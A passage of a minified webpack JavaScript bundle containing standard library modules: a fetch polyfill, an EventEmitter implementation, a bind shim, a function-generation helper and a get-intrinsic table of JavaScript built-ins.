                                ])) : s && (ArrayBuffer.prototype.isPrototypeOf(e) || u(e)) ? this._bodyArrayBuffer = g(e) : this._bodyText = e = Object.prototype.toString.call(e) : this._bodyText = "", this.headers.get("content-type") || ("string" == typeof e ? this.headers.set("content-type", "text/plain;charset=UTF-8") : this._bodyBlob && this._bodyBlob.type ? this.headers.set("content-type", this._bodyBlob.type) : r && URLSearchParams.prototype.isPrototypeOf(e) && this.headers.set("content-type", "application/x-www-form-urlencoded;charset=UTF-8"));
                            }, i && (this.blob = function() {
                                var e = f(this);
                                if (e) return e;
                                if (this._bodyBlob) return Promise.resolve(this._bodyBlob);
                                if (this._bodyArrayBuffer) return Promise.resolve(new Blob([
                                    this._bodyArrayBuffer
                                ]));
                                if (this._bodyFormData) throw new Error("could not read FormData body as blob");
                                return Promise.resolve(new Blob([
                                    this._bodyText
                                ]));
                            }, this.arrayBuffer = function() {
                                return this._bodyArrayBuffer ? f(this) || Promise.resolve(this._bodyArrayBuffer) : this.blob().then(m);
                            }), this.text = function() {
                                var e, t, r, n = f(this);
                                if (n) return n;
                                if (this._bodyBlob) return e = this._bodyBlob, r = p(t = new FileReader), t.readAsText(e), r;
                                if (this._bodyArrayBuffer) return Promise.resolve(function(e) {
                                    for(var t = new Uint8Array(e), r = new Array(t.length), n = 0; n < t.length; n++)r[n] = String.fromCharCode(t[n]);
                                    return r.join("");
                                }(this._bodyArrayBuffer));
                                if (this._bodyFormData) throw new Error("could not read FormData body as text");
                                return Promise.resolve(this._bodyText);
                            }, o && (this.formData = function() {
                                return this.text().then(E);
                            }), this.json = function() {
                                return this.text().then(JSON.parse);
                            }, this;
                        }
                        h.prototype.append = function(e, t) {
                            e = c(e), t = l(t);
                            var r = this.map[e];
                            this.map[e] = r ? r + ", " + t : t;
                        }, h.prototype.delete = function(e) {
                            delete this.map[c(e)];
                        }, h.prototype.get = function(e) {
                            return e = c(e), this.has(e) ? this.map[e] : null;
                        }, h.prototype.has = function(e) {
                            return this.map.hasOwnProperty(c(e));
                        }, h.prototype.set = function(e, t) {
                            this.map[c(e)] = l(t);
                        }, h.prototype.forEach = function(e, t) {
                            for(var r in this.map)this.map.hasOwnProperty(r) && e.call(t, this.map[r], r, this);
                        }, h.prototype.keys = function() {
                            var e = [];
                            return this.forEach(function(t, r) {
                                e.push(r);
                            }), d(e);
                        }, h.prototype.values = function() {
                            var e = [];
                            return this.forEach(function(t) {
                                e.push(t);
                            }), d(e);
                        }, h.prototype.entries = function() {
                            var e = [];
                            return this.forEach(function(t, r) {
                                e.push([
                                    r,
                                    t
                                ]);
                            }), d(e);
                        }, n && (h.prototype[Symbol.iterator] = h.prototype.entries);
                        var v = [
                            "DELETE",
                            "GET",
                            "HEAD",
                            "OPTIONS",
                            "POST",
                            "PUT"
                        ];
                        function b(e, t) {
                            var r, n, i = (t = t || {}).body;
                            if (e instanceof b) {
                                if (e.bodyUsed) throw new TypeError("Already read");
                                this.url = e.url, this.credentials = e.credentials, t.headers || (this.headers = new h(e.headers)), this.method = e.method, this.mode = e.mode, this.signal = e.signal, i || null == e._bodyInit || (i = e._bodyInit, e.bodyUsed = !0);
                            } else this.url = String(e);
                            if (this.credentials = t.credentials || this.credentials || "same-origin", !t.headers && this.headers || (this.headers = new h(t.headers)), this.method = (n = (r = t.method || this.method || "GET").toUpperCase(), v.indexOf(n) > -1 ? n : r), this.mode = t.mode || this.mode || null, this.signal = t.signal || this.signal, this.referrer = null, ("GET" === this.method || "HEAD" === this.method) && i) throw new TypeError("Body not allowed for GET or HEAD requests");
                            this._initBody(i);
                        }
                        function E(e) {
                            var t = new FormData;
                            return e.trim().split("&").forEach(function(e) {
                                if (e) {
                                    var r = e.split("="), n = r.shift().replace(/\+/g, " "), i = r.join("=").replace(/\+/g, " ");
                                    t.append(decodeURIComponent(n), decodeURIComponent(i));
                                }
                            }), t;
                        }
                        function A(e, t) {
                            t || (t = {}), this.type = "default", this.status = void 0 === t.status ? 200 : t.status, this.ok = this.status >= 200 && this.status < 300, this.statusText = "statusText" in t ? t.statusText : "OK", this.headers = new h(t.headers), this.url = t.url || "", this._initBody(e);
                        }
                        b.prototype.clone = function() {
                            return new b(this, {
                                body: this._bodyInit
                            });
                        }, y.call(b.prototype), y.call(A.prototype), A.prototype.clone = function() {
                            return new A(this._bodyInit, {
                                status: this.status,
                                statusText: this.statusText,
                                headers: new h(this.headers),
                                url: this.url
                            });
                        }, A.error = function() {
                            var e = new A(null, {
                                status: 0,
                                statusText: ""
                            });
                            return e.type = "error", e;
                        };
                        var _ = [
                            301,
                            302,
                            303,
                            307,
                            308
                        ];
                        A.redirect = function(e, t) {
                            if (-1 === _.indexOf(t)) throw new RangeError("Invalid status code");
                            return new A(null, {
                                status: t,
                                headers: {
                                    location: e
                                }
                            });
                        }, t.DOMException = e.DOMException;
                        try {
                            new t.DOMException;
                        } catch (e) {
                            t.DOMException = function(e, t) {
                                this.message = e, this.name = t;
                                var r = Error(e);
                                this.stack = r.stack;
                            }, t.DOMException.prototype = Object.create(Error.prototype), t.DOMException.prototype.constructor = t.DOMException;
                        }
                        function w(e, r) {
                            return new Promise(function(n, o) {
                                var s = new b(e, r);
                                if (s.signal && s.signal.aborted) return o(new t.DOMException("Aborted", "AbortError"));
                                var a = new XMLHttpRequest;
                                function u() {
                                    a.abort();
                                }
                                a.onload = function() {
                                    var e, t, r = {
                                        status: a.status,
                                        statusText: a.statusText,
                                        headers: (e = a.getAllResponseHeaders() || "", t = new h, e.replace(/\r?\n[\t ]+/g, " ").split(/\r?\n/).forEach(function(e) {
                                            var r = e.split(":"), n = r.shift().trim();
                                            if (n) {
                                                var i = r.join(":").trim();
                                                t.append(n, i);
                                            }
                                        }), t)
                                    };
                                    r.url = "responseURL" in a ? a.responseURL : r.headers.get("X-Request-URL");
                                    var i = "response" in a ? a.response : a.responseText;
                                    n(new A(i, r));
                                }, a.onerror = function() {
                                    o(new TypeError("Network request failed"));
                                }, a.ontimeout = function() {
                                    o(new TypeError("Network request failed"));
                                }, a.onabort = function() {
                                    o(new t.DOMException("Aborted", "AbortError"));
                                }, a.open(s.method, s.url, !0), "include" === s.credentials ? a.withCredentials = !0 : "omit" === s.credentials && (a.withCredentials = !1), "responseType" in a && i && (a.responseType = "blob"), s.headers.forEach(function(e, t) {
                                    a.setRequestHeader(t, e);
                                }), s.signal && (s.signal.addEventListener("abort", u), a.onreadystatechange = function() {
                                    4 === a.readyState && s.signal.removeEventListener("abort", u);
                                }), a.send(void 0 === s._bodyInit ? null : s._bodyInit);
                            });
                        }
                        w.polyfill = !0, e.fetch || (e.fetch = w, e.Headers = h, e.Request = b, e.Response = A), t.Headers = h, t.Request = b, t.Response = A, t.fetch = w, Object.defineProperty(t, "__esModule", {
                            value: !0
                        });
                    }({});
                }(n), n.fetch.ponyfill = !0, delete n.fetch.polyfill;
                var i = n;
                (t = i.fetch).default = i.fetch, t.fetch = i.fetch, t.Headers = i.Headers, t.Request = i.Request, t.Response = i.Response, e.exports = t;
            },
            2699: (e)=>{
                "use strict";
                var t, r = "object" == typeof Reflect ? Reflect : null, n = r && "function" == typeof r.apply ? r.apply : function(e, t, r) {
                    return Function.prototype.apply.call(e, t, r);
                };
                t = r && "function" == typeof r.ownKeys ? r.ownKeys : Object.getOwnPropertySymbols ? function(e) {
                    return Object.getOwnPropertyNames(e).concat(Object.getOwnPropertySymbols(e));
                } : function(e) {
                    return Object.getOwnPropertyNames(e);
                };
                var i = Number.isNaN || function(e) {
                    return e != e;
                };
                function o() {
                    o.init.call(this);
                }
                e.exports = o, e.exports.once = function(e, t) {
                    return new Promise(function(r, n) {
                        function i(r) {
                            e.removeListener(t, o), n(r);
                        }
                        function o() {
                            "function" == typeof e.removeListener && e.removeListener("error", i), r([].slice.call(arguments));
                        }
                        m(e, t, o, {
                            once: !0
                        }), "error" !== t && function(e, t, r) {
                            "function" == typeof e.on && m(e, "error", t, {
                                once: !0
                            });
                        }(e, i);
                    });
                }, o.EventEmitter = o, o.prototype._events = void 0, o.prototype._eventsCount = 0, o.prototype._maxListeners = void 0;
                var s = 10;
                function a(e) {
                    if ("function" != typeof e) throw new TypeError('The "listener" argument must be of type Function. Received type ' + typeof e);
                }
                function u(e) {
                    return void 0 === e._maxListeners ? o.defaultMaxListeners : e._maxListeners;
                }
                function c(e, t, r, n) {
                    var i, o, s, c;
                    if (a(r), void 0 === (o = e._events) ? (o = e._events = Object.create(null), e._eventsCount = 0) : (void 0 !== o.newListener && (e.emit("newListener", t, r.listener ? r.listener : r), o = e._events), s = o[t]), void 0 === s) s = o[t] = r, ++e._eventsCount;
                    else if ("function" == typeof s ? s = o[t] = n ? [
                        r,
                        s
                    ] : [
                        s,
                        r
                    ] : n ? s.unshift(r) : s.push(r), (i = u(e)) > 0 && s.length > i && !s.warned) {
                        s.warned = !0;
                        var l = new Error("Possible EventEmitter memory leak detected. " + s.length + " " + String(t) + " listeners added. Use emitter.setMaxListeners() to increase limit");
                        l.name = "MaxListenersExceededWarning", l.emitter = e, l.type = t, l.count = s.length, c = l, console && console.warn && console.warn(c);
                    }
                    return e;
                }
                function l() {
                    if (!this.fired) return this.target.removeListener(this.type, this.wrapFn), this.fired = !0, 0 === arguments.length ? this.listener.call(this.target) : this.listener.apply(this.target, arguments);
                }
                function d(e, t, r) {
                    var n = {
                        fired: !1,
                        wrapFn: void 0,
                        target: e,
                        type: t,
                        listener: r
                    }, i = l.bind(n);
                    return i.listener = r, n.wrapFn = i, i;
                }
                function h(e, t, r) {
                    var n = e._events;
                    if (void 0 === n) return [];
                    var i = n[t];
                    return void 0 === i ? [] : "function" == typeof i ? r ? [
                        i.listener || i
                    ] : [
                        i
                    ] : r ? function(e) {
                        for(var t = new Array(e.length), r = 0; r < t.length; ++r)t[r] = e[r].listener || e[r];
                        return t;
                    }(i) : p(i, i.length);
                }
                function f(e) {
                    var t = this._events;
                    if (void 0 !== t) {
                        var r = t[e];
                        if ("function" == typeof r) return 1;
                        if (void 0 !== r) return r.length;
                    }
                    return 0;
                }
                function p(e, t) {
                    for(var r = new Array(t), n = 0; n < t; ++n)r[n] = e[n];
                    return r;
                }
                function m(e, t, r, n) {
                    if ("function" == typeof e.on) n.once ? e.once(t, r) : e.on(t, r);
                    else {
                        if ("function" != typeof e.addEventListener) throw new TypeError('The "emitter" argument must be of type EventEmitter. Received type ' + typeof e);
                        e.addEventListener(t, function i(o) {
                            n.once && e.removeEventListener(t, i), r(o);
                        });
                    }
                }
                Object.defineProperty(o, "defaultMaxListeners", {
                    enumerable: !0,
                    get: function() {
                        return s;
                    },
                    set: function(e) {
                        if ("number" != typeof e || e < 0 || i(e)) throw new RangeError('The value of "defaultMaxListeners" is out of range. It must be a non-negative number. Received ' + e + ".");
                        s = e;
                    }
                }), o.init = function() {
                    void 0 !== this._events && this._events !== Object.getPrototypeOf(this)._events || (this._events = Object.create(null), this._eventsCount = 0), this._maxListeners = this._maxListeners || void 0;
                }, o.prototype.setMaxListeners = function(e) {
                    if ("number" != typeof e || e < 0 || i(e)) throw new RangeError('The value of "n" is out of range. It must be a non-negative number. Received ' + e + ".");
                    return this._maxListeners = e, this;
                }, o.prototype.getMaxListeners = function() {
                    return u(this);
                }, o.prototype.emit = function(e) {
                    for(var t = [], r = 1; r < arguments.length; r++)t.push(arguments[r]);
                    var i = "error" === e, o = this._events;
                    if (void 0 !== o) i = i && void 0 === o.error;
                    else if (!i) return !1;
                    if (i) {
                        var s;
                        if (t.length > 0 && (s = t[0]), s instanceof Error) throw s;
                        var a = new Error("Unhandled error." + (s ? " (" + s.message + ")" : ""));
                        throw a.context = s, a;
                    }
                    var u = o[e];
                    if (void 0 === u) return !1;
                    if ("function" == typeof u) n(u, this, t);
                    else {
                        var c = u.length, l = p(u, c);
                        for(r = 0; r < c; ++r)n(l[r], this, t);
                    }
                    return !0;
                }, o.prototype.addListener = function(e, t) {
                    return c(this, e, t, !1);
                }, o.prototype.on = o.prototype.addListener, o.prototype.prependListener = function(e, t) {
                    return c(this, e, t, !0);
                }, o.prototype.once = function(e, t) {
                    return a(t), this.on(e, d(this, e, t)), this;
                }, o.prototype.prependOnceListener = function(e, t) {
                    return a(t), this.prependListener(e, d(this, e, t)), this;
                }, o.prototype.removeListener = function(e, t) {
                    var r, n, i, o, s;
                    if (a(t), void 0 === (n = this._events)) return this;
                    if (void 0 === (r = n[e])) return this;
                    if (r === t || r.listener === t) 0 == --this._eventsCount ? this._events = Object.create(null) : (delete n[e], n.removeListener && this.emit("removeListener", e, r.listener || t));
                    else if ("function" != typeof r) {
                        for(i = -1, o = r.length - 1; o >= 0; o--)if (r[o] === t || r[o].listener === t) {
                            s = r[o].listener, i = o;
                            break;
                        }
                        if (i < 0) return this;
                        0 === i ? r.shift() : function(e, t) {
                            for(; t + 1 < e.length; t++)e[t] = e[t + 1];
                            e.pop();
                        }(r, i), 1 === r.length && (n[e] = r[0]), void 0 !== n.removeListener && this.emit("removeListener", e, s || t);
                    }
                    return this;
                }, o.prototype.off = o.prototype.removeListener, o.prototype.removeAllListeners = function(e) {
                    var t, r, n;
                    if (void 0 === (r = this._events)) return this;
                    if (void 0 === r.removeListener) return 0 === arguments.length ? (this._events = Object.create(null), this._eventsCount = 0) : void 0 !== r[e] && (0 == --this._eventsCount ? this._events = Object.create(null) : delete r[e]), this;
                    if (0 === arguments.length) {
                        var i, o = Object.keys(r);
                        for(n = 0; n < o.length; ++n)"removeListener" !== (i = o[n]) && this.removeAllListeners(i);
                        return this.removeAllListeners("removeListener"), this._events = Object.create(null), this._eventsCount = 0, this;
                    }
                    if ("function" == typeof (t = r[e])) this.removeListener(e, t);
                    else if (void 0 !== t) for(n = t.length - 1; n >= 0; n--)this.removeListener(e, t[n]);
                    return this;
                }, o.prototype.listeners = function(e) {
                    return h(this, e, !0);
                }, o.prototype.rawListeners = function(e) {
                    return h(this, e, !1);
                }, o.listenerCount = function(e, t) {
                    return "function" == typeof e.listenerCount ? e.listenerCount(t) : f.call(e, t);
                }, o.prototype.listenerCount = f, o.prototype.eventNames = function() {
                    return this._eventsCount > 0 ? t(this._events) : [];
                };
            },
            3243: (e, t, r)=>{
                "use strict";
                var n = r(9680), i = Object.prototype.toString, o = Object.prototype.hasOwnProperty, s = function(e, t, r) {
                    for(var n = 0, i = e.length; n < i; n++)o.call(e, n) && (null == r ? t(e[n], n, e) : t.call(r, e[n], n, e));
                }, a = function(e, t, r) {
                    for(var n = 0, i = e.length; n < i; n++)null == r ? t(e.charAt(n), n, e) : t.call(r, e.charAt(n), n, e);
                }, u = function(e, t, r) {
                    for(var n in e)o.call(e, n) && (null == r ? t(e[n], n, e) : t.call(r, e[n], n, e));
                };
                e.exports = function(e, t, r) {
                    if (!n(t)) throw new TypeError("iterator must be a function");
                    var o;
                    arguments.length >= 3 && (o = r), "[object Array]" === i.call(e) ? s(e, t, o) : "string" == typeof e ? a(e, t, o) : u(e, t, o);
                };
            },
            7795: (e)=>{
                "use strict";
                var t = "Function.prototype.bind called on incompatible ", r = Array.prototype.slice, n = Object.prototype.toString, i = "[object Function]";
                e.exports = function(e) {
                    var o = this;
                    if ("function" != typeof o || n.call(o) !== i) throw new TypeError(t + o);
                    for(var s, a = r.call(arguments, 1), u = function() {
                        if (this instanceof s) {
                            var t = o.apply(this, a.concat(r.call(arguments)));
                            return Object(t) === t ? t : this;
                        }
                        return o.apply(e, a.concat(r.call(arguments)));
                    }, c = Math.max(0, o.length - a.length), l = [], d = 0; d < c; d++)l.push("$" + d);
                    if (s = Function("binder", "return function (" + l.join(",") + "){ return binder.apply(this,arguments); }")(u), o.prototype) {
                        var h = function() {};
                        h.prototype = o.prototype, s.prototype = new h, h.prototype = null;
                    }
                    return s;
                };
            },
            4090: (e, t, r)=>{
                "use strict";
                var n = r(7795);
                e.exports = Function.prototype.bind || n;
            },
            8616: (e, t, r)=>{
                for(var n = r(3335), i = r(892), o = /[\{\[]/, s = /[\}\]]/, a = [
                    "do",
                    "if",
                    "in",
                    "for",
                    "let",
                    "new",
                    "try",
                    "var",
                    "case",
                    "else",
                    "enum",
                    "eval",
                    "null",
                    "this",
                    "true",
                    "void",
                    "with",
                    "await",
                    "break",
                    "catch",
                    "class",
                    "const",
                    "false",
                    "super",
                    "throw",
                    "while",
                    "yield",
                    "delete",
                    "export",
                    "import",
                    "public",
                    "return",
                    "static",
                    "switch",
                    "typeof",
                    "default",
                    "extends",
                    "finally",
                    "package",
                    "private",
                    "continue",
                    "debugger",
                    "function",
                    "arguments",
                    "interface",
                    "protected",
                    "implements",
                    "instanceof",
                    "NaN",
                    "undefined"
                ], u = {}, c = 0; c < a.length; c++)u[a[c]] = !0;
                var l = function(e) {
                    return i(e) && !u.hasOwnProperty(e);
                }, d = {
                    s: function(e) {
                        return "" + e;
                    },
                    d: function(e) {
                        return "" + Number(e);
                    },
                    o: function(e) {
                        return JSON.stringify(e);
                    }
                }, h = function() {
                    var e = [], t = 0, r = {}, a = function(r) {
                        for(var n = ""; n.length < 2 * t;)n += "  ";
                        e.push(n + r);
                    }, u = function(e) {
                        return s.test(e.trim()[0]) && o.test(e[e.length - 1]) ? (t--, a(e), void t++) : o.test(e[e.length - 1]) ? (a(e), void t++) : s.test(e.trim()[0]) ? (t--, void a(e)) : void a(e);
                    }, c = function(e) {
                        if (!e) return c;
                        if (1 === arguments.length && e.indexOf("\n") > -1) for(var t = e.trim().split("\n"), r = 0; r < t.length; r++)u(t[r].trim());
                        else u(n.format.apply(n, arguments));
                        return c;
                    };
                    return c.scope = {}, c.formats = d, c.sym = function(e) {
                        return e && l(e) || (e = "tmp"), r[e] || (r[e] = 0), e + (r[e]++ || "");
                    }, c.property = function(e, t) {
                        return 1 === arguments.length && (t = e, e = ""), i(t += "") ? e ? e + "." + t : t : e ? e + "[" + JSON.stringify(t) + "]" : JSON.stringify(t);
                    }, c.toString = function() {
                        return e.join("\n");
                    }, c.toFunction = function(e) {
                        e || (e = {});
                        var t = "return (" + c.toString() + ")";
                        Object.keys(c.scope).forEach(function(t) {
                            e[t] || (e[t] = c.scope[t]);
                        });
                        var r = Object.keys(e).map(function(e) {
                            return e;
                        }), n = r.map(function(t) {
                            return e[t];
                        });
                        return Function.apply(null, r.concat(t)).apply(null, n);
                    }, arguments.length && c.apply(null, arguments), c;
                };
                h.formats = d, e.exports = h;
            },
            6e3: (e, t, r)=>{
                var n = r(892), i = function(e, t) {
                    return n(t) ? e + "." + t : e + "[" + JSON.stringify(t) + "]";
                };
                i.valid = n, i.property = function(e) {
                    return n(e) ? e : JSON.stringify(e);
                }, e.exports = i;
            },
            7286: (e, t, r)=>{
                "use strict";
                var n, i = SyntaxError, o = Function, s = TypeError, a = function(e) {
                    try {
                        return o('"use strict"; return (' + e + ").constructor;")();
                    } catch (e) {}
                }, u = Object.getOwnPropertyDescriptor;
                if (u) try {
                    u({}, "");
                } catch (e) {
                    u = null;
                }
                var c = function() {
                    throw new s;
                }, l = u ? function() {
                    try {
                        return c;
                    } catch (e) {
                        try {
                            return u(arguments, "callee").get;
                        } catch (e) {
                            return c;
                        }
                    }
                }() : c, d = r(2636)(), h = Object.getPrototypeOf || function(e) {
                    return e.__proto__;
                }, f = {}, p = "undefined" == typeof Uint8Array ? n : h(Uint8Array), m = {
                    "%AggregateError%": "undefined" == typeof AggregateError ? n : AggregateError,
                    "%Array%": Array,
                    "%ArrayBuffer%": "undefined" == typeof ArrayBuffer ? n : ArrayBuffer,
                    "%ArrayIteratorPrototype%": d ? h([][Symbol.iterator]()) : n,
                    "%AsyncFromSyncIteratorPrototype%": n,
                    "%AsyncFunction%": f,
                    "%AsyncGenerator%": f,
                    "%AsyncGeneratorFunction%": f,
                    "%AsyncIteratorPrototype%": f,
                    "%Atomics%": "undefined" == typeof Atomics ? n : Atomics,
                    "%BigInt%": "undefined" == typeof BigInt ? n : BigInt,
                    "%Boolean%": Boolean,
                    "%DataView%": "undefined" == typeof DataView ? n : DataView,
                    "%Date%": Date,
                    "%decodeURI%": decodeURI,
                    "%decodeURIComponent%": decodeURIComponent,
                    "%encodeURI%": encodeURI,
                    "%encodeURIComponent%": encodeURIComponent,
                    "%Error%": Error,
                    "%eval%": eval,
                    "%EvalError%": EvalError,
                    "%Float32Array%": "undefined" == typeof Float32Array ? n : Float32Array,
                    "%Float64Array%": "undefined" == typeof Float64Array ? n : Float64Array,
                    "%FinalizationRegistry%": "undefined" == typeof FinalizationRegistry ? n : FinalizationRegistry,
                    "%Function%": o,
                    "%GeneratorFunction%": f,
                    "%Int8Array%": "undefined" == typeof Int8Array ? n : Int8Array,
                    "%Int16Array%": "undefined" == typeof Int16Array ? n : Int16Array,
                    "%Int32Array%": "undefined" == typeof Int32Array ? n : Int32Array,
                    "%isFinite%": isFinite,
                    "%isNaN%": isNaN,
                    "%IteratorPrototype%": d ? h(h([][Symbol.iterator]())) : n,
                    "%JSON%": "object" == typeof JSON ? JSON : n,
                    "%Map%": "undefined" == typeof Map ? n : Map,
                    "%MapIteratorPrototype%": "undefined" != typeof Map && d ? h((new Map)[Symbol.iterator]()) : n,
                    "%Math%": Math,
                    "%Number%": Number,
                    "%Object%": Object,
                    "%parseFloat%": parseFloat,
                    "%parseInt%": parseInt,
                    "%Promise%": "undefined" == typeof Promise ? n : Promise,
                    "%Proxy%": "undefined" == typeof Proxy ? n : Proxy,
                    "%RangeError%": RangeError,
                    "%ReferenceError%": ReferenceError,
                    "%Reflect%": "undefined" == typeof Reflect ? n : Reflect,
                    "%RegExp%": RegExp,
                    "%Set%": "undefined" == typeof Set ? n : Set,
                    "%SetIteratorPrototype%": "undefined" != typeof Set && d ? h((new Set)[Symbol.iterator]()) : n,
                    "%SharedArrayBuffer%": "undefined" == typeof SharedArrayBuffer ? n : SharedArrayBuffer,
                    "%String%": String,
                    "%StringIteratorPrototype%": d ? h(""[Symbol.iterator]()) : n,
                    "%Symbol%": d ? Symbol : n,
                    "%SyntaxError%": i,
                    "%ThrowTypeError%": l,
                    "%TypedArray%": p,
                    "%TypeError%": s,
                    "%Uint8Array%": "undefined" == typeof Uint8Array ? n : Uint8Array,
                    "%Uint8ClampedArray%": "undefined" == typeof Uint8ClampedArray ? n : Uint8ClampedArray,
                    "%Uint16Array%": "undefined" == typeof Uint16Array ? n : Uint16Array,
                    "%Uint32Array%": "undefined" == typeof Uint32Array ? n : Uint32Array,
                    "%URIError%": URIError,
                    "%WeakMap%": "undefined" == typeof WeakMap ? n : WeakMap,
                    "%WeakRef%": "undefined" == typeof WeakRef ? n : WeakRef,
                    "%WeakSet%": "undefined" == typeof WeakSet ? n : WeakSet
                }, g = function e(t) {
                    var r;
                    if ("%AsyncFunction%" === t) r = a("async function () {}");
                    else if ("%GeneratorFunction%" === t) r = a("function* () {}");
                    else if ("%AsyncGeneratorFunction%" === t) r = a("async function* () {}");
                    else if ("%AsyncGenerator%" === t) {
                        var n = e("%AsyncGeneratorFunction%");
                        n && (r = n.prototype);
                    } else if ("%AsyncIteratorPrototype%" === t) {
                        var i = e("%AsyncGenerator%");
                        i && (r = h(i.prototype));
                    }
                    return m[t] = r, r;
                }, y = {
                    "%ArrayBufferPrototype%": [
                        "ArrayBuffer",
                        "prototype"
                    ],
                    "%ArrayPrototype%": [
                        "Array",
                        "prototype"
                    ],
                    "%ArrayProto_entries%": [
                        "Array",
                        "prototype",
                        "entries"
                    ],
                    "%ArrayProto_forEach%": [
                        "Array",
                        "prototype",
                        "forEach"
                    ],
                    "%ArrayProto_keys%": [
                        "Array",
                        "prototype",
                        "keys"
                    ],
                    "%ArrayProto_values%": [
                        "Array",
                        "prototype",
                        "values"
                    ],
                    "%AsyncFunctionPrototype%": [
                        "AsyncFunction",
                        "prototype"
                    ],
                    "%AsyncGenerator%": [
                        "AsyncGeneratorFunction",
                        "prototype"
                    ],
                    "%AsyncGeneratorPrototype%": [
                        "AsyncGeneratorFunction",
                        "prototype",
                        "prototype"
                    ],
                    "%BooleanPrototype%": [
                        "Boolean",
                        "prototype"
                    ],
                    "%DataViewPrototype%": [
                        "DataView",
                        "prototype"
                    ],
                    "%DatePrototype%": [
                        "Date",
                        "prototype"
                    ],
                    "%ErrorPrototype%": [
                        "Error",
                        "prototype"
                    ],
                    "%EvalErrorPrototype%": [
                        "EvalError",
                        "prototype"
                    ],
                    "%Float32ArrayPrototype%": [
                        "Float32Array",
                        "prototype"
                    ],
                    "%Float64ArrayPrototype%": [
                        "Float64Array",
                        "prototype"
                    ],
                    "%FunctionPrototype%": [
                        "Function",
                        "prototype"
                    ],
                    "%Generator%": [
                        "GeneratorFunction",
                        "prototype"
                    ],
                    "%GeneratorPrototype%": [
                        "GeneratorFunction",
                        "prototype",
                        "prototype"
                    ],
                    "%Int8ArrayPrototype%": [
                        "Int8Array",
                        "prototype"
                    ],
                    "%Int16ArrayPrototype%": [
                        "Int16Array",
                        "prototype"
                    ],
                    "%Int32ArrayPrototype%": [
                        "Int32Array",
                        "prototype"
                    ],
                    "%JSONParse%": [
                        "JSON",
                        "parse"
                    ],
                    "%JSONStringify%": [
                        "JSON",
                        "stringify"
                    ],
                    "%MapPrototype%": [
                        "Map",
                        "prototype"
                    ],
                    "%NumberPrototype%": [
                        "Number",
                        "prototype"
                    ],
                    "%ObjectPrototype%": [
                        "Object",
                        "prototype"
                    ],
                    "%ObjProto_toString%": [
                        "Object",
                        "prototype",
                        "toString"
                    ],
                    "%ObjProto_valueOf%": [
                        "Object",
                        "prototype",
                        "valueOf"
                    ],
                    "%PromisePrototype%": [
                        "Promise",
                        "prototype"
                    ],
                    "%PromiseProto_then%": [
                        "Promise",
                        "prototype",
                        "then"
                    ],
                    "%Promise_all%": [
                        "Promise",
                        "all"
                    ],
                    "%Promise_reject%": [
                        "Promise",
                        "reject"
                    ],
                    "%Promise_resolve%": [
                        "Promise",
                        "resolve"
                    ],
                    "%RangeErrorPrototype%": [
                        "RangeError",
                        "prototype"
                    ],
                    "%ReferenceErrorPrototype%": [
                        "ReferenceError",
                        "prototype"
                    ],
                    "%RegExpPrototype%": [
                        "RegExp",
                        "prototype"
                    ],
                    "%SetPrototype%": [
                        "Set",
                        "prototype"
                    ],
                    "%SharedArrayBufferPrototype%": [
                        "SharedArrayBuffer",
                        "prototype"
                    ],
                    "%StringPrototype%": [
                        "String",
                        "prototype"
                    ],
                    "%SymbolPrototype%": [
                        "Symbol",
                        "prototype"
                    ],
                    "%SyntaxErrorPrototype%": [
                        "SyntaxError",
                        "prototype"
                    ],
                    "%TypedArrayPrototype%": [
                        "TypedArray",
                        "prototype"
                    ],
                    "%TypeErrorPrototype%": [
                        "TypeError",
                        "prototype"
                    ],
                    "%Uint8ArrayPrototype%": [
                        "Uint8Array",
                        "prototype"
                    ],
                    "%Uint8ClampedArrayPrototype%": [
                        "Uint8ClampedArray",
                        "prototype"
                    ],
                    "%Uint16ArrayPrototype%": [
                        "Uint16Array",
                        "prototype"
                    ],
                    "%Uint32ArrayPrototype%": [
                        "Uint32Array",
                        "prototype"
                    ],
                    "%URIErrorPrototype%": [
                        "URIError",
                        "prototype"
                    ],
                    "%WeakMapPrototype%": [
                        "WeakMap",
                        "prototype"
                    ],
                    "%WeakSetPrototype%": [
                        "WeakSet",
                        "prototype"
                    ]
                }, v = r(4090), b = r(3198), E = v.call(Function.call, Array.prototype.concat), A = v.call(Function.apply, Array.prototype.splice), _ = v.call(Function.call, String.prototype.replace), w = v.call(Function.call, String.prototype.slice), T = v.call(Function.call, RegExp.prototype.exec), R = /[^%.[\]]+|\[(?:(-?\d+(?:\.\d+)?)|(["'])((?:(?!\2)[^\\]|\\.)*?)\2)\]|(?=(?:\.|\[\])(?:\.|\[\]|%$))/g, I = /\\(\\)?/g, S = function(e) {
                    var t = w(e, 0, 1), r = w(e, -1);
                    if ("%" === t && "%" !== r) throw new i("invalid intrinsic syntax, expected closing `%`");
                    if ("%" === r && "%" !== t) throw new i("invalid intrinsic syntax, expected opening `%`");
                    var n = [];
                    return _(e, R, function(e, t, r, i) {
                        n[n.length] = r ? _(i, I, "$1") : t || e;
                    }), n;
                }, P = function(e, t) {
                    var r, n = e;
                    if (b(y, n) && (n = "%" + (r = y[n])[0] + "%"), b(m, n)) {
                        var o = m[n];
                        if (o === f && (o = g(n)), void 0 === o && !t) throw new s("intrinsic " + e + " exists, but is not available. Please file an issue!");
                        return {
                            alias: r,
                            name: n,
                            value: o
                        };
                    }
                    throw new i("intrinsic " + e + " does not exist!");
                };
                e.exports = function(e, t) {
                    if ("string" != typeof e || 0 === e.length) throw new s("intrinsic name must be a non-empty string");
                    if (arguments.length > 1 && "boolean" != typeof t) throw new s('"allowMissing" argument must be a boolean');
                    if (null === T(/^%?[^%]*%?$/g, e)) throw new i("`%` may not be present anywhere but at the beginning and end of the intrinsic name");
                    var r = S(e), n = r.length > 0 ? r[0] : "", o = P("%" + n + "%", t), a = o.name, c = o.value, l = !1, d = o.alias;
                    d && (n = d[0], A(r, E([
                        0,
                        1
                    ], d)));
                    for(var h = 1, f = !0; h < r.length; h += 1){
                        var p = r[h], g = w(p, 0, 1), y = w(p, -1);
                        if (('"' === g || "'" === g || "`" === g || '"' === y || "'" === y || "`" === y) && g !== y) throw new i("property names with quotes must have matching quotes");
                        if ("constructor" !== p && f || (l = !0), b(m, a = "%" + (n += "." + p) + "%")) c = m[a];
                        else if (null != c) {
                            if (!(p in c)) {
                                if (!t) throw new s("base intrinsic for " + e + " exists, but the property is not available.");
                                return;
                            }
                            if (u && h + 1 >= r.length) {
                                var v = u(c, p);
                                c = (f = !!v) && "get" in v && !("originalValue" in v.get) ? v.get : c[p];
                            } else f = b(c, p), c = c[p];
                            f && !l && (m[a] = c);
                        }
                    }
                    return c;
                };
            },
            2636: (e, t, r)=>{
                "use strict";
